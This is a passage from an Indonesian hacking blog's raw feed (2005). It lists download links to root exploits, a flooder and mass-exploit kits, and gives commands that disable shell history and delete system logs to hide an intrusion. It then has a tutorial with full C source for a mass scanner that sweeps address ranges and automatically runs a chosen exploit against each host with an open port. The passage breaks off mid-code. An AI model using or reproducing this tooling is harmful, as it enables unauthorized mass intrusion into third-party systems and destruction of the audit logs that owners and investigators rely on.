/&gt;http://brutalside.host.sk/tools/psybnc2.2.2.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/kik&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;toolsss&lt;br /&gt;http://brutalside.host.sk/tools/wget-1.5.1-1.i386.rpm&lt;br /&gt;http://brutalside.host.sk/tools/gcc-3.0.4.tar.gz&lt;br /&gt;&lt;br /&gt;This is for local exploit&lt;br /&gt;http://brutalside.host.sk/tools/local.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/local2.tar.gz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;COBALT LOCAL EXPLOIT :: aucobalt60.sh :: [ usage : sh aucobalt60.sh ]&lt;br /&gt;http://brutalside.host.sk/tools/aucobalt60.sh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is for removing logs&lt;br /&gt;&lt;br /&gt;write this for remove the history : export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0&lt;br /&gt;&lt;br /&gt;Write this for remove all logs : rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------&lt;br /&gt;&lt;br /&gt;http://www.gohanz.com/putty.exe&lt;br /&gt;http://www.gohanz.com/msamba.tar.gz&lt;br /&gt;http://www.gohanz.com/shv4.tar.gz&lt;br /&gt;http://www.gohanz.com/Luckroot.tar&lt;br /&gt;http://www.gohanz.com/xpost.tgz&lt;br /&gt;http://www.gohanz.com/grabbb-0.1.0.tar.gz&lt;br /&gt;http://www.gohanz.com/udpflood.zip&lt;br /&gt;http://www.gohanz.com/iisscan.zip&lt;br /&gt;http://www.gohanz.com/port.tcl&lt;br /&gt;http://www.gohanz.com/bind&lt;br /&gt;http://www.gohanz.com/massplo.tar.gz&lt;br /&gt;http://www.gohanz.com/psyBNC2.3.tar.gz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933661761887130?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933661761887130/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933661761887130&amp;isPopup=true' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933661761887130'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933661761887130'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/tools-hacking.html' title='tools hacking'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933651352135206</id><published>2005-02-25T20:01:00.000+07:00</published><updated>2005-02-25T20:01:53.533+07:00</updated><title type='text'>scanner hacking gabungan</title><content type='html'>/*********************************************************&lt;br /&gt; * Mass Scanner menggunakan gabungan &lt;br /&gt; * beberapa tool dan satu exploit&lt;br /&gt; *&lt;br /&gt; * oleh    : iko (iko94@yahoo.com)&lt;br /&gt; * release : dec,15,200*&lt;br /&gt; *&lt;br /&gt; * No Warranty. This tutorial is for educational use only, &lt;br /&gt; * commercial use is prohibited.&lt;br /&gt; *&lt;br /&gt; **********************************************************/&lt;br /&gt;&lt;br /&gt; Masih ingat dengan artikel berjudul "Menggunakan Mass Scanner Dengan Telnet &lt;br /&gt; Fingerprint Metode Shell Scripting" (milik mas scut di indohack.sf.net) ?&lt;br /&gt; Artikel tersebut menerangkan tentang bagaimana cara mencoba satu exploit ke banyak &lt;br /&gt; target sasaran yang berupa daftar di satu file. Mass Scanner Telnet Fingerprint itu&lt;br /&gt; mempunyai satu kelemahan yaitu kita harus sudah membuat satu daftar nomor ip yang&lt;br /&gt; akan di-scan.&lt;br /&gt; Nah, bagaimana caranya agar kita tinggal mengetikkan satu baris perintah saja dan&lt;br /&gt; semuanya akan berjalan dengan sendirinya ?&lt;br /&gt; Berikut ini akan penulis jelaskan caranya, beserta tools yang diperlukan.&lt;br /&gt; Tools:&lt;br /&gt; 1. mass.c (dicomot dari massplo.tar.gz milik mas slamet, source code di bawah)&lt;br /&gt; 2. mig-port-scan.c (milik no1 =&gt; greyhats.za.net , source code ada di bawah)&lt;br /&gt; 3. sebuah script sederhana (try.sh)&lt;br /&gt; 4. sebuah file log temporer&lt;br /&gt; 5. sebuah exploit&lt;br /&gt; 6. banyak kesabaran :)&lt;br /&gt; Pertama-tama tentukan satu exploit yang akan dipakai (contoh : explo.c), kemudian &lt;br /&gt; compile file tersebut (catatan : anda harus memahami betul bagaimana cara kerja &lt;br /&gt; exploit tersebut). Langkah ke dua, compile file mig-port-scan.c . Langkah ke tiga,&lt;br /&gt; buatlah satu script sederhana, yang akan kita gunakan untuk melakukan pengecekan&lt;br /&gt; server target mana yang mempunyai port yang terbuka sesuai dengan kebutuhan exploit &lt;br /&gt; kita, jika benar terbuka, maka exploit akan dijalankan dan melakukan penetrasi ke&lt;br /&gt; server target. &lt;br /&gt; Contoh script sederhana ini :&lt;br /&gt; -----------try.sh start here--------------&lt;br /&gt; #!/bin/sh&lt;br /&gt; #&lt;br /&gt; ./mig-port-scan -h $1 -p port_yg_discan -o log_temporer&lt;br /&gt; sleep 1&lt;br /&gt; cat log_temporer&lt;br /&gt; CEK="`cat log_temporer | awk '{print $2}'`"&lt;br /&gt; if [ "$CEK" = "Open" ]; then&lt;br /&gt;   echo "OK server $1 terbuka, kita coba..."&lt;br /&gt;   ./exploit -t $1&lt;br /&gt; fi&lt;br /&gt; echo "kita coba yang lain..... :("&lt;br /&gt; -----------try.sh end here-----------------&lt;br /&gt; Simpan dan chmod +x try.sh ini.&lt;br /&gt; Perhatikan bahwa argumen $1 di atas mewakili nomor ip target kita, sedang sleep 1 &lt;br /&gt; detik digunakan untuk menanti konek back dari mig-port-scan (yaitu hasil scan).&lt;br /&gt; Perhatikan juga tanda baca backquote (jangan sampai salah lho !) di variable CEK.&lt;br /&gt; Anda juga harus mengganti baris ./exploit -t $1 , dengan perintah untuk menjalankan&lt;br /&gt; exploit anda (dengan segala argumen-nya tentu!).&lt;br /&gt; Ada dua keuntungan pemakaian try.sh ini, yaitu jika terjadi kondisi :&lt;br /&gt; 1. ketika exploit kita mandeg di tengah jalan (seperti stagnant/nyantol);&lt;br /&gt; 2. ketika kita sudah berhasil masuk ke suatu server target, dan kita ingin &lt;br /&gt;    meneruskan proses scanning kita;&lt;br /&gt; maka kita tinggal memencet tombol control+c, dan proses pun akan terus berjalan,&lt;br /&gt; karena yang ditutup adalah program script ini dan bukan program mass.&lt;br /&gt; Nah, kita tinggal mengedit program utama, yaitu mass.c&lt;br /&gt; Perhatikan source mass.c di baris perintah berikut:&lt;br /&gt; sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));&lt;br /&gt; nah di situlah letak script kita tadi, baris tersebut menjalankan script kita&lt;br /&gt; dengan cara memberikannya ke variabel luck (lihat baris system(luck);). Masih &lt;br /&gt; tertarik ? Makanya segera belajarlah bahasa pemrograman !!!&lt;br /&gt; Langkah terakhir, kita harus mengkompile mass.c agar bisa kita jalankan.&lt;br /&gt; #gcc mass.c -o massexploit -Wall&lt;br /&gt; lalu jalankan mass scanner kita :&lt;br /&gt; #./massexploit &lt;br /&gt; ikuti petunjuknya !&lt;br /&gt; Selamat mencoba !!!&lt;br /&gt;&lt;br /&gt; Berikut ini source code mass.c:&lt;br /&gt;-----------------mass.c begin here-------------------------&lt;br /&gt; #include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;time.h&gt;&lt;br /&gt;#include &lt;fcntl.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;#include &lt;errno.h&gt;&lt;br /&gt;&lt;br /&gt;#define MAX_SOCKETS 500&lt;br /&gt;#define TIMEOUT 5&lt;br /&gt;&lt;br /&gt;#define S_NONE       0&lt;br /&gt;#define S_CONNECTING 1&lt;br /&gt;&lt;br /&gt;struct conn_t {&lt;br /&gt;  int s;&lt;br /&gt;  char status;&lt;br /&gt;  time_t a;&lt;br /&gt;  struct sockaddr_in addr;&lt;br /&gt;};&lt;br /&gt;struct conn_t connlist[MAX_SOCKETS];&lt;br /&gt;&lt;br /&gt;void init_sockets(void);&lt;br /&gt;void check_sockets(void);&lt;br /&gt;void fatal(char *);&lt;br /&gt;&lt;br /&gt;int main(int argc, char *argv[])&lt;br /&gt;{&lt;br /&gt;  int done, i, aa, bb, cc, dd, ret, k, ns;&lt;br /&gt;  unsigned int port;&lt;br /&gt;  time_t scantime;&lt;br /&gt;  char ip[20];&lt;br /&gt;&lt;br /&gt;  if (argc &lt; 3) {&lt;br /&gt;     printf("Usage: %s &lt;a-block&gt; &lt;port&gt; [b-block] [c-block]\n", argv[0]);&lt;br /&gt;     return -1;&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;&lt;br /&gt;&lt;br /&gt;  aa = atoi(argv[1]);&lt;br /&gt;  if ((aa &lt; 0) || (aa &gt; 255)) {&lt;br /&gt;     fatal("Invalid a-range\n");&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  port = (unsigned int)atoi(argv[2]);&lt;br /&gt;  if (port == 0)&lt;br /&gt;     fatal("Bad port number.\n");&lt;br /&gt;&lt;br /&gt;  if (argc &gt;= 4) {&lt;br /&gt;     bb = atoi(argv[3]);&lt;br /&gt;     if ((bb &lt; 0) || (bb &gt; 255))&lt;br /&gt;        fatal("Invalid b-range.\n");&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  if (argc &gt;= 5) {&lt;br /&gt;     cc = atoi(argv[4]);&lt;br /&gt;     if ((cc &lt; 0) || (cc &gt; 255))&lt;br /&gt;        fatal("Invalid c-range.\n");&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  init_sockets();&lt;br /&gt;&lt;br /&gt;  scantime = time(0);&lt;br /&gt;&lt;br /&gt;  while(!done) {&lt;br /&gt;     for (i = 0; i &lt; MAX_SOCKETS; i++) {&lt;br /&gt;        if (dd == 255) {&lt;br /&gt;           if (cc &lt; 255) {&lt;br /&gt;              cc++;&lt;br /&gt;              dd = 0;&lt;br /&gt;           }&lt;br /&gt;           else {&lt;br /&gt;              if (bb &lt; 255) {&lt;br /&gt;                 bb++;&lt;br /&gt;                 cc = 0;&lt;br /&gt;                 dd = 0;&lt;br /&gt;              }&lt;br /&gt;              else {&lt;br /&gt;                 if (aa &lt; 255) {&lt;br /&gt;                    aa++;&lt;br /&gt;                    bb = 0;&lt;br /&gt;                    cc = 0;&lt;br /&gt;                    dd = 0;&lt;br /&gt;                 }&lt;br /&gt;                 else {&lt;br /&gt;                    ns = 0;&lt;br /&gt;                    for (k = 0; k &lt; MAX_SOCKETS; k++) {&lt;br /&gt;                        if (connlist[k].status &gt; S_NONE)&lt;br /&gt;                           ns++;&lt;br /&gt;                    }&lt;br /&gt;&lt;br /&gt;                    if (ns == 0)&lt;br /&gt;                       break;&lt;br /&gt;                 }&lt;br /&gt;&lt;br /&gt;              }&lt;br /&gt;           }&lt;br /&gt;       }&lt;br /&gt;&lt;br /&gt;        if (connlist[i].status == S_NONE) {&lt;br /&gt;           connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);&lt;br /&gt;           if (connlist[i].s != -1) {&lt;br /&gt;             ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);&lt;br /&gt;             if (ret == -1) {&lt;br /&gt;                printf("Unable to set O_NONBLOCK\n");&lt;br /&gt;                close(connlist[i].s);&lt;br /&gt;             }&lt;br /&gt;             else {&lt;br /&gt;               memset((char *)ip, 0, 20);&lt;br /&gt;               sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);&lt;br /&gt;               connlist[i].addr.sin_addr.s_addr = inet_addr(ip);&lt;br /&gt;               if (connlist[i].addr.sin_addr.s_addr == -1)&lt;br /&gt;                  fatal("Invalid IP.");&lt;br /&gt;               connlist[i].addr.sin_family = AF_INET;&lt;br /&gt;               connlist[i].addr.sin_port = htons(port);&lt;br /&gt;               connlist[i].a = time(0);&lt;br /&gt;               connlist[i].status = S_CONNECTING;&lt;br /&gt;               dd++;&lt;br /&gt;              }&lt;br /&gt;           }&lt;br /&gt;        }&lt;br /&gt;    }&lt;br /&gt;&lt;br /&gt;    check_sockets();&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void init_sockets(void)&lt;br /&gt;{&lt;br /&gt;  int i;&lt;br /&gt;&lt;br /&gt;  for (i = 0; i &lt; MAX_SOCKETS; i++) {&lt;br /&gt;      connlist[i].status = S_NONE;&lt;br /&gt;      memset((struct sockaddr_in *)&amp;connlist[i].addr, 0,&lt;br /&gt;             sizeof(struct sockaddr_in));&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void check_sockets(void)&lt;br /&gt;{&lt;br /&gt;  int i, ret;&lt;br /&gt;&lt;br /&gt;  for (i = 0; i &lt; MAX_SOCKETS; i++) {&lt;br /&gt;      if ((connlist[i].a &lt; (time(0) - TIMEOUT)) &amp;&amp;&lt;br /&gt;          (connlist[i].status == S_CONNECTING)) {&lt;br /&gt;         close(connlist[i].s);&lt;br /&gt;         connlist[i].status = S_NONE;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt;      else if (connlist[i].status == S_CONNECTING) {&lt;br /&gt;         ret = connect(connlist[i].s,&lt;br /&gt;                       (struct sockaddr *)&amp;connlist[i].addr,&lt;br /&gt;                       sizeof(struct sockaddr_in));&lt;br /&gt;         if (ret == -1) {&lt;br /&gt;            if (errno == EISCONN) {&lt;br /&gt;               printf("%s\n",&lt;br /&gt;                      (char *)inet_ntoa(connlist[i].addr.sin_addr),&lt;br /&gt;                      (time(0)-connlist[i].a));&lt;br /&gt;               close(connlist[i].s);&lt;br /&gt;               connlist[i].status = S_NONE;&lt;br /&gt;            }&lt;br /&gt;&lt;br /&gt;            if ((errno != EALREADY) &amp;&amp; (errno != EINPROGRESS)) {&lt;br /&gt;               close(connlist[i].s);&lt;br /&gt;               connlist[i].status = S_NONE;&lt;br /&gt;            }&lt;br /&gt;         }&lt;br /&gt;         else {&lt;br /&gt;           char luck[100];&lt;br /&gt;           sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));&lt;br /&gt;           printf("Sodok ip %s\n",&lt;br /&gt;                  (char *)inet_ntoa(connlist[i].addr.sin_addr),&lt;br /&gt;                  (time(0)-connlist[i].a));&lt;br /&gt;           system(luck);&lt;br /&gt;           printf("Wuasuu, cuk...\n");&lt;br /&gt;           close(connlist[i].s);&lt;br /&gt;           connlist[i].status = S_NONE;&lt;br /&gt;         }&lt;br /&gt;      }&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void fatal(char *err)&lt;br /&gt;{&lt;br /&gt;  int i;&lt;br /&gt;  printf("Error: %s\n", err);&lt;br /&gt;  for (i = 0; i &lt; MAX_SOCKETS; i++) {&lt;br /&gt;      if (connlist[i].status &gt;= S_CONNECTING)&lt;br /&gt;         close(connlist[i].s);&lt;br /&gt;  }&lt;br /&gt;  exit(-1);&lt;br /&gt;}&lt;br /&gt;---------------mass.c end here--------------------------------------&lt;br /&gt;&lt;br /&gt;Berikut source code mig-port-scan.c &lt;br /&gt;---------------mig-port-scan.c start here---------------------------&lt;br /&gt;/****************&lt;br /&gt;name            :       mig-port-scan.c&lt;br /&gt;&lt;br /&gt;version         :       1.0&lt;br /&gt;&lt;br /&gt;creation date   :       15th of October 2002&lt;br /&gt;&lt;br /&gt;author          :       no1 ( greyhats.za.net )&lt;br /&gt;&lt;br /&gt;description     :       veeery fast connect() port scanner&lt;br /&gt;with multi-host scanning support&lt;br /&gt;&lt;br /&gt;usage           :       gcc mig-port-scan.c -o mig-port-scan -Wall&lt;br /&gt;./mig-port-scan&lt;br /&gt;&lt;br /&gt;extra           :       nmap is just too slow for simple connect()&lt;br /&gt;scans of big IP lists thats why i coded this.&lt;br /&gt;                        if you have any comments or suggestions, mail &lt;br /&gt;me at no1@greyhats.za.net or msg me at &lt;br /&gt;http://greyhats.za.net/guestbook/&lt;br /&gt;****************/&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;time.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;ctype.h&gt;&lt;br /&gt;#include &lt;fcntl.h&gt;&lt;br /&gt;#include &lt;netdb.h&gt;&lt;br /&gt;#include &lt;signal.h&gt;&lt;br /&gt;#include &lt;errno.h&gt;&lt;br /&gt;#include &lt;sys/wait.h&gt;&lt;br /&gt;#include &lt;sys/select.h&gt;&lt;br /&gt;#include &lt;sys/time.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;#include &lt;arpa/inet.h&gt;&lt;br /&gt;#include &lt;arpa/nameser.h&gt;&lt;br /&gt;int                      scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v);&lt;br /&gt;int                      get_port(char *ports, char *backup);&lt;br /&gt;int                      Connect(int fd, char *ip, int port, int time_out, int debug);&lt;br /&gt;int                      usage(char *arg);&lt;br /&gt;long                     hosts_scanned = 0;&lt;br /&gt;long                     ports_scanned = 12;&lt;br /&gt;int main(int argc, char **argv)&lt;br /&gt;{&lt;br /&gt;  int                      TIMEOUT = 3;&lt;br /&gt;  int                      CHILDREN = 50;&lt;br /&gt;  int                      PORT = 0;&lt;br /&gt;  int                      DEBUG = 0;&lt;br /&gt;  int                      i = 0;&lt;br /&gt;  int                      p = 0;&lt;br /&gt;  int                      log_check = 0;&lt;br /&gt;  int                      flag = 0;&lt;br /&gt;  int                      status;&lt;br /&gt;  int                      verbose = 0;&lt;br /&gt;  FILE                    *fp;&lt;br /&gt;  FILE                    *ld;&lt;br /&gt;  char                     IP[16] = "127.0.0.1";&lt;br /&gt;  char                     INPUT[256] = "./input318";&lt;br /&gt;  char                     OUTPUT[256] = "./log";&lt;br /&gt;  char                     PORTS[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";&lt;br /&gt;  char                     PORTS_BACKUP[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";&lt;br /&gt;  char                    *P_PORTS;&lt;br /&gt;  char                    *P_PORTS_BACKUP;&lt;br /&gt;  char                     opt;&lt;br /&gt;  P_PORTS = PORTS;&lt;br /&gt;  P_PORTS_BACKUP = PORTS_BACKUP;&lt;br /&gt;  while((opt = getopt(argc, argv, "h:i:p:o:c:t:vd")) != -1)&lt;br /&gt;  {&lt;br /&gt;    switch (opt)&lt;br /&gt;    {&lt;br /&gt;      case 'h':// ip&lt;br /&gt;      {&lt;br /&gt;flag++;&lt;br /&gt;bzero(IP, sizeof(IP));&lt;br /&gt;strcpy(IP, optarg);&lt;br /&gt;remove("./input318");&lt;br /&gt;fp = fopen(INPUT, "w");&lt;br /&gt;fprintf(fp, "%s\n", IP);&lt;br /&gt;fclose(fp);&lt;br /&gt;fp = fopen(INPUT, "r");&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 'i':// file with ips&lt;br /&gt;      {&lt;br /&gt;flag++;&lt;br /&gt;bzero(INPUT, sizeof(INPUT));&lt;br /&gt;strcpy(INPUT, optarg);&lt;br /&gt;fp = fopen(INPUT, "r");&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 'p':// ports in 21,22,23 format&lt;br /&gt;      {&lt;br /&gt;bzero(PORTS, sizeof(PORTS));&lt;br /&gt;bzero(PORTS_BACKUP, sizeof(PORTS_BACKUP));&lt;br /&gt;strcpy(PORTS, optarg);&lt;br /&gt;strcpy(PORTS_BACKUP, optarg);&lt;br /&gt;strcat(PORTS, ",:");&lt;br /&gt;strcat(PORTS_BACKUP, ",:");&lt;br /&gt;puts("TEST");&lt;br /&gt;ports_scanned = 0;&lt;br /&gt;for(; PORTS[p] != 0; p++)&lt;br /&gt;{&lt;br /&gt;  if(PORTS[p] == 44)&lt;br /&gt;    ports_scanned++;&lt;br /&gt;}&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 'o':// log file (stdout if not used)&lt;br /&gt;      {&lt;br /&gt;log_check = 1;&lt;br /&gt;strcpy(OUTPUT, optarg);&lt;br /&gt;ld = fopen(OUTPUT, "w");&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 'c':// number of children&lt;br /&gt;      {&lt;br /&gt;CHILDREN = atoi(optarg);&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 't':// timeout value for connect/read/write&lt;br /&gt;      {&lt;br /&gt;TIMEOUT = atoi(optarg);&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 'v':// verbose mode&lt;br /&gt;      {&lt;br /&gt;verbose++;&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;      case 'd':// debuging output&lt;br /&gt;      {&lt;br /&gt;DEBUG = 1;&lt;br /&gt;break;&lt;br /&gt;      }&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;  if((flag == 2) || (flag == 0))&lt;br /&gt;  {&lt;br /&gt;    usage(argv[0]);&lt;br /&gt;    exit(1);&lt;br /&gt;  }&lt;br /&gt;  while((fgets(IP, sizeof(IP), fp)) != NULL)&lt;br /&gt;  {&lt;br /&gt;    hosts_scanned++;&lt;br /&gt;  }&lt;br /&gt;  fclose(fp);&lt;br /&gt;  printf("\n [0;32m******************************** [0m\n");&lt;br /&gt;  printf(" [0;32m* MIG Port Scanner v1.0 by  [0;31mno1  [0;32m* [0m\n");&lt;br /&gt;  printf(" [0;32m******************************** [0m\n\n");&lt;br /&gt;  printf("Hosts being scanned: %ld\n", hosts_scanned);&lt;br /&gt;  printf("Ports being scanned: %ld\n\n", ports_scanned);&lt;br /&gt;  bzero(IP, sizeof(IP));&lt;br /&gt;  fp = fopen(INPUT, "r");&lt;br /&gt;  while((fgets(IP, sizeof(IP), fp)) != NULL)&lt;br /&gt;  {&lt;br /&gt;    IP[strlen(IP) - 1] = '\0';&lt;br /&gt;    for(; (PORT = get_port(P_PORTS, P_PORTS_BACKUP)) != 0; i++)&lt;br /&gt;    {&lt;br /&gt;      switch (fork())&lt;br /&gt;      {&lt;br /&gt;case 0:&lt;br /&gt;{&lt;br /&gt;  scan(IP, PORT, TIMEOUT, DEBUG, &amp;ld, log_check, verbose);&lt;br /&gt;  _exit(0);&lt;br /&gt;  break;&lt;br /&gt;}&lt;br /&gt;case -1:&lt;br /&gt;{&lt;br /&gt;  perror("fork error");&lt;br /&gt;  _exit(0);&lt;br /&gt;  break;&lt;br /&gt;}&lt;br /&gt;default:&lt;br /&gt;{&lt;br /&gt;  if(i &gt; CHILDREN - 2)&lt;br /&gt;  {&lt;br /&gt;    wait(&amp;status);&lt;br /&gt;    i--;&lt;br /&gt;  }&lt;br /&gt;  break;&lt;br /&gt;}&lt;br /&gt;      }&lt;br /&gt;    }&lt;br /&gt;    bzero(IP, sizeof(IP));&lt;br /&gt;  }&lt;br /&gt;  remove("./input318");&lt;br /&gt;  fclose(fp);&lt;br /&gt;  return 0;&lt;br /&gt;}&lt;br /&gt;int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v)&lt;br /&gt;{&lt;br /&gt;  FILE                    *logs = *log;&lt;br /&gt;  int                      sockfd;&lt;br /&gt;  int                      stat;&lt;br /&gt;  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) &lt; 0)&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; socket() error\n", ip, port);&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  stat = Connect(sockfd, ip, port, time_out, debug);&lt;br /&gt;  if(stat == -1)&lt;br /&gt;  {&lt;br /&gt;    if(logcheck == 1)&lt;br /&gt;    {&lt;br /&gt;      if(v == 1)&lt;br /&gt;fprintf(logs, "[%s][%d] Closed\n", ip, port);&lt;br /&gt;      fflush(logs);&lt;br /&gt;      close(sockfd);&lt;br /&gt;    }&lt;br /&gt;    else&lt;br /&gt;    {&lt;br /&gt;      if(v == 1)&lt;br /&gt;fprintf(stdout, "[%s][%d] Closed\n", ip, port);&lt;br /&gt;      fflush(stdout);&lt;br /&gt;      close(sockfd);&lt;br /&gt;    }&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  if(stat == -2)&lt;br /&gt;  {&lt;br /&gt;    if(logcheck == 1)&lt;br /&gt;    {&lt;br /&gt;      if(v == 1)&lt;br /&gt;fprintf(logs, "[%s][%d] Closed (could be firewall)\n", ip, port);&lt;br /&gt;      fflush(logs);&lt;br /&gt;      close(sockfd);&lt;br /&gt;    }&lt;br /&gt;    else&lt;br /&gt;    {&lt;br /&gt;      if(v == 1)&lt;br /&gt;fprintf(stdout, "[%s][%d] Closed (could be firewall)\n", ip, port);&lt;br /&gt;      fflush(stdout);&lt;br /&gt;      close(sockfd);&lt;br /&gt;    }&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  else&lt;br /&gt;  {&lt;br /&gt;    if(logcheck == 1)&lt;br /&gt;    {&lt;br /&gt;      fprintf(logs, "[%s][%d] Open\n", ip, port);&lt;br /&gt;      fflush(logs);&lt;br /&gt;      close(sockfd);&lt;br /&gt;    }&lt;br /&gt;    else&lt;br /&gt;    {&lt;br /&gt;      fprintf(stdout, "[%s][%d] Open\n", ip, port);&lt;br /&gt;      fflush(stdout);&lt;br /&gt;      close(sockfd);&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;  return (0);&lt;br /&gt;}&lt;br /&gt;int get_port(char *ports, char *backup)&lt;br /&gt;{&lt;br /&gt;  int                      i;&lt;br /&gt;  int                      x;&lt;br /&gt;  int                      z;&lt;br /&gt;  char                     port[5];&lt;br /&gt;  char                     tmp[256];&lt;br /&gt;  bzero(port, sizeof(port));&lt;br /&gt;  bzero(tmp, sizeof(tmp));&lt;br /&gt;  strcpy(tmp, ports);&lt;br /&gt;  for(i = 0; ports[i] != ','; i++)&lt;br /&gt;  {&lt;br /&gt;    if(ports[i] == ':')&lt;br /&gt;    {&lt;br /&gt;      strcpy(ports, backup);&lt;br /&gt;      return 0;&lt;br /&gt;    }&lt;br /&gt;    port[i] = ports[i];&lt;br /&gt;  }&lt;br /&gt;  port[strlen(port)] = '\0';&lt;br /&gt;  for(z = strlen(port) + 1, x = 0; z &lt; strlen(ports); z++)&lt;br /&gt;  {&lt;br /&gt;    ports[x++] = tmp[z];&lt;br /&gt;  }&lt;br /&gt;  ports[x] = '\0';&lt;br /&gt;  return atoi(port);&lt;br /&gt;}&lt;br /&gt;int Connect(int fd, char *ip, int port, int time_out, int debug)&lt;br /&gt;{&lt;br /&gt;  int                      flags;&lt;br /&gt;  int                      select_status;&lt;br /&gt;  fd_set                   connect_read, connect_write;&lt;br /&gt;  struct timeval           timeout;&lt;br /&gt;  int                      getsockopt_length = 0;&lt;br /&gt;  int                      getsockopt_error = 0;&lt;br /&gt;  struct sockaddr_in       server;&lt;br /&gt;  bzero(&amp;server, sizeof(server));&lt;br /&gt;  server.sin_family = AF_INET;&lt;br /&gt;  inet_pton(AF_INET, ip, &amp;server.sin_addr);&lt;br /&gt;  server.sin_port = htons(port);&lt;br /&gt;  if((flags = fcntl(fd, F_GETFL, 0)) &lt; 0)&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; fcntl() error getting socket flags\n", ip, port);&lt;br /&gt;    close(fd);&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) &lt; 0)&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; fcntl() error setting socket non-blocking\n", ip, port);&lt;br /&gt;    close(fd);&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  timeout.tv_sec = time_out;&lt;br /&gt;  timeout.tv_usec = 0;&lt;br /&gt;  FD_ZERO(&amp;connect_read);&lt;br /&gt;  FD_ZERO(&amp;connect_write);&lt;br /&gt;  FD_SET(fd, &amp;connect_read);&lt;br /&gt;  FD_SET(fd, &amp;connect_write);&lt;br /&gt;  if((connect(fd, (struct sockaddr *) &amp;server, sizeof(server))) &lt; 0)&lt;br /&gt;  {&lt;br /&gt;    if(errno != EINPROGRESS)&lt;br /&gt;    {&lt;br /&gt;      if(debug 